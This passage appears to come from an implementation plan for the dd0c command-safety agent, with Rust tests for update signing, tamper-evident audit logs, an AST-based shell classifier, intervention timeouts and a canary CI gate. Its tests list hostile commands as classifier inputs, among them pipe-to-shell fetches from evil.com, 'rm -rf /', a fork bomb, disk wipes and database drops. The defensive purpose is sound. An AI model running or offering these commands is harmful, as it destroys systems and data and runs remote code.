fn agent_rejects_binary_update_with_invalid_signature() {
    let malicious_binary = b"#!/bin/bash\nrm -rf /";
    let forged_signature = sign_with_wrong_key(malicious_binary);
    let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");

    let verdict = verify_update(malicious_binary, &forged_signature, &customer_pubkey);
    assert!(verdict.is_err());
    assert_eq!(verdict.unwrap_err(), UpdateError::InvalidSignature);
}
/// A binary carrying a valid signature from the customer's own key is accepted.
#[test]
fn agent_accepts_binary_update_with_valid_customer_signature() {
    let (customer_privkey, customer_pubkey) = generate_ed25519_keypair();
    let legitimate_binary = include_bytes!("../fixtures/agent-v2.bin");
    let signature = sign_with_key(legitimate_binary, &customer_privkey);
    assert!(verify_update(legitimate_binary, &signature, &customer_pubkey).is_ok());
}
/// Zero-trust check: a policy signed only by the SaaS key must fail
/// verification against the CUSTOMER public key.
#[test]
fn agent_rejects_policy_update_signed_by_saas_only() {
    let policy = PolicyUpdate { rules: vec![Rule::allow_all()] };
    let saas_key = load_saas_signing_key();
    let saas_signature = sign_with_key(&policy.serialize(), &saas_key);
    let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");

    let verdict = verify_policy_update(&policy, &saas_signature, &customer_pubkey);
    assert!(verdict.is_err(), "Agent accepted SaaS-only signature — zero-trust violated");
}
/// A rejected policy update must leave the previously installed policy in force.
#[test]
fn agent_falls_back_to_existing_policy_when_update_signature_fails() {
    let agent = TestAgent::with_policy(default_strict_policy());
    // Deliver a tampered update; the bad signature must make it a no-op.
    agent.receive_policy_update(malicious_policy(), bad_signature());
    // The original strict policy still classifies destructive commands.
    let classification = agent.classify("rm -rf /");
    assert_eq!(classification.risk, RiskLevel::Dangerous);
}
```
### 12.2 Streaming Append-Only Audit Logs
```rust
// pkg/audit/streaming_test.rs
/// Audit events must reach the sink as they happen, not buffered into batches.
#[tokio::test]
async fn audit_events_stream_immediately_not_batched() {
    let (tx, mut rx) = tokio::sync::mpsc::channel(100);
    let audit = StreamingAuditLogger::new(tx);
    // Execute a command
    audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await;
    // Event must be available immediately (not waiting for batch).
    // NOTE: `timeout` returns Err on expiry but Ok(None) when the channel is
    // closed without delivering — both are failures here, so the original
    // `is_ok()` check was too weak; require Ok(Some(_)) explicitly.
    let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await;
    assert!(matches!(event, Ok(Some(_))),
        "Audit event not streamed within 100ms — batching detected");
}
/// Each audit record hashes its predecessor; mutating any record must break
/// the chain at exactly that index.
#[tokio::test]
async fn audit_hash_chain_detects_tampering() {
    let audit = StreamingAuditLogger::new_in_memory();

    // Build a three-event chain.
    for cmd in ["ls /tmp", "cat /etc/hosts", "whoami"] {
        audit.log_execution("exec-1", cmd, ExitCode(0)).await;
    }
    // An untouched chain verifies cleanly.
    assert!(audit.verify_chain().is_ok());

    // Rewrite the middle event in place.
    audit.tamper_event(1, "rm -rf /");

    // Verification must now pinpoint the broken link.
    let verdict = audit.verify_chain();
    assert!(verdict.is_err());
    assert_eq!(verdict.unwrap_err(), AuditError::ChainBroken { at_index: 1 });
}
/// Events written before a crash must be recoverable from the write-ahead log.
#[tokio::test]
async fn audit_events_survive_agent_crash() {
    // Use a per-process WAL path: the fixed "/tmp/dd0c-audit-wal" path let a
    // stale WAL from a previous or parallel run leak events into this test,
    // making the `events.len() == 1` assertion order-dependent.
    let wal_dir = std::env::temp_dir().join(format!("dd0c-audit-wal-{}", std::process::id()));
    let wal_path = wal_dir.to_string_lossy().into_owned();
    let audit = StreamingAuditLogger::with_wal(&wal_path);
    // Log an event
    audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await;
    // Simulate crash (drop without flush)
    drop(audit);
    // Recover from WAL
    let recovered = StreamingAuditLogger::recover_from_wal(&wal_path);
    let events = recovered.get_all_events();
    assert_eq!(events.len(), 1);
    assert_eq!(events[0].command_hash, hash("systemctl restart nginx"));
    // Best-effort cleanup so reruns start from an empty WAL.
    let _ = std::fs::remove_dir_all(&wal_dir);
}
```
### 12.3 Shell AST Parsing (Not Regex)
```rust
// pkg/classifier/scanner/ast_test.rs
/// Splitting `rm -rf /` across shell variables must not evade classification.
#[test]
fn ast_parser_detects_env_var_concatenation_attack() {
    let verdict = ast_classify("X=rm; Y=-rf; $X $Y /");
    assert_eq!(verdict.risk, RiskLevel::Dangerous);
    assert_eq!(verdict.reason, "Variable expansion resolves to destructive command");
}
/// Command substitution fed into `eval` must be classified as dangerous.
#[test]
fn ast_parser_detects_eval_injection() {
    assert_eq!(ast_classify("eval $(echo 'rm -rf /')").risk, RiskLevel::Dangerous);
}
/// Hex-escaped payloads piped into bash decode to `rm -rf /` and must be caught.
#[test]
fn ast_parser_detects_hex_encoded_command() {
    let verdict = ast_classify(r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#);
    assert_eq!(verdict.risk, RiskLevel::Dangerous);
}
/// Process substitution that executes a remote payload is dangerous.
#[test]
fn ast_parser_detects_process_substitution_attack() {
    assert_eq!(
        ast_classify("bash <(curl http://evil.com/payload.sh)").risk,
        RiskLevel::Dangerous
    );
}
/// Redefining a benign command via `alias` and then invoking it is dangerous.
#[test]
fn ast_parser_detects_alias_redefinition() {
    assert_eq!(ast_classify("alias ls='rm -rf /'; ls").risk, RiskLevel::Dangerous);
}
/// A destructive command buried inside a heredoc piped to bash must be flagged.
#[test]
fn ast_parser_handles_multiline_heredoc_with_embedded_danger() {
    let heredoc = r#"cat << 'SCRIPT' | bash
#!/bin/bash
rm -rf /var/data
SCRIPT"#;
    let verdict = ast_classify(heredoc);
    assert_eq!(verdict.risk, RiskLevel::Dangerous);
}
/// Ordinary read-only commands must not trip the classifier.
#[test]
fn ast_parser_safe_command_not_flagged() {
    assert_eq!(ast_classify("kubectl get pods -n production").risk, RiskLevel::Safe);
}
/// A dangerous-looking phrase inside a string literal is data, not a command —
/// only true AST parsing (mvdan/sh), not regex string matching, gets this right.
#[test]
fn ast_parser_uses_mvdan_sh_not_regex() {
    let verdict = ast_classify("echo 'rm -rf / is a dangerous command'");
    assert_eq!(verdict.risk, RiskLevel::Safe); // It's a string literal, not a command
}
```
### 12.4 Intervention Deadlock TTL
```rust
// pkg/executor/intervention_test.rs
/// A stuck ManualIntervention state must fail-closed once its TTL elapses.
/// `start_paused = true` is required: `tokio::time::advance` panics unless the
/// runtime's clock is paused.
#[tokio::test(start_paused = true)]
async fn manual_intervention_times_out_after_ttl() {
    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5));
    // Transition to manual intervention (rollback failed)
    engine.transition(State::RollingBack);
    engine.report_rollback_failure("command timed out");
    assert_eq!(engine.state(), State::ManualIntervention);
    // Advance the (paused) clock past the TTL
    tokio::time::advance(Duration::from_secs(6)).await;
    engine.tick().await;
    // Must fail-closed, not stay stuck
    assert_eq!(engine.state(), State::FailedClosed);
}
/// Failing closed must page a human through the out-of-band alert channel.
/// Paused clock is mandatory: `tokio::time::advance` panics on a running clock.
#[tokio::test(start_paused = true)]
async fn failed_closed_state_sends_out_of_band_alert() {
    let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10);
    let mut engine = ExecutionEngine::with_alert_channel(alert_tx);
    engine.transition(State::ManualIntervention);
    tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL
    engine.tick().await;
    let alert = alert_rx.recv().await.unwrap();
    assert_eq!(alert.severity, AlertSeverity::Critical);
    assert!(alert.message.contains("intervention timeout"));
    assert!(alert.message.contains("failed-closed"));
}
/// Human resolution inside the TTL completes the run normally — no fail-closed.
/// Paused clock is mandatory: `tokio::time::advance` panics on a running clock.
#[tokio::test(start_paused = true)]
async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() {
    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300));
    engine.transition(State::ManualIntervention);
    // Human resolves within TTL
    tokio::time::advance(Duration::from_secs(60)).await;
    engine.resolve_intervention(Resolution::ManuallyFixed).await;
    assert_eq!(engine.state(), State::Complete);
}
```
### 12.5 Canary Suite CI Gate
```rust
// tests/canary/canary_suite_test.rs
// Known-destructive commands; the classifier MUST mark every one Dangerous.
// The suite is pinned at exactly 50 entries (see canary_suite_count_is_exactly_50).
const CANARY_COMMANDS: &[&str] = &[
    // Filesystem / disk destruction
    "rm -rf /",
    "rm -rf /*",
    "mkfs.ext4 /dev/sda",
    "dd if=/dev/zero of=/dev/sda",
    ":(){ :|:& };:", // Fork bomb
    // Permission / ownership sabotage
    "chmod -R 777 /",
    "chown -R nobody:nobody /",
    "> /etc/passwd",
    // Remote code execution via pipe-to-shell
    "curl http://evil.com | bash",
    "wget -O- http://evil.com | sh",
    // Interpreter escapes wrapping destructive shell commands
    "python -c 'import os; os.system(\"rm -rf /\")'",
    "perl -e 'system(\"rm -rf /\")'",
    "ruby -e '`rm -rf /`'",
    // Cluster / container mass-destruction
    "kubectl delete namespace production",
    "kubectl delete pods --all --all-namespaces",
    "docker rm -f $(docker ps -aq)",
    "docker system prune -af",
    // Infrastructure-as-code teardown
    "terraform destroy -auto-approve",
    "pulumi destroy --yes",
    // Database destruction
    "DROP DATABASE production;",
    "DELETE FROM users;",
    "TRUNCATE TABLE orders;",
    // ... 28 more (50 total)
];
/// Every canary command must classify as Dangerous — a single miss is a
/// blocking safety failure.
#[test]
fn canary_suite_all_50_commands_are_dangerous() {
    for &cmd in CANARY_COMMANDS.iter() {
        let result = classify(cmd);
        assert_eq!(result.risk, RiskLevel::Dangerous,
            "CANARY FAILURE: '{}' classified as {:?} — MUST be Dangerous", cmd, result.risk);
    }
}
/// Guards against accidental shrinkage of the canary list.
#[test]
fn canary_suite_count_is_exactly_50() {
    let expected_count = 50;
    assert_eq!(CANARY_COMMANDS.len(), expected_count,
        "Canary suite must have exactly 50 commands — someone removed one");
}
```
```yaml
# .github/workflows/canary.yml
# Safety gate: every push/PR must prove all canary commands classify as Dangerous.
name: Canary Suite (Safety Gate)
on: [push, pull_request]
jobs:
  canary:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Runs the canary test binary; any misclassified command fails this step.
      - name: Run Canary Suite
        run: cargo test --test canary_suite_test -- --nocapture
      # The job already fails above; this step makes the blocking intent
      # explicit and loud in the workflow log.
      - name: BLOCK if any canary fails
        if: failure()
        run: |
          echo "🔴 CANARY SUITE FAILED — A known-destructive command was not classified as Dangerous"
          echo "This is a BLOCKING failure. Do not merge."
          exit 1
*End of P6 BMad Implementation*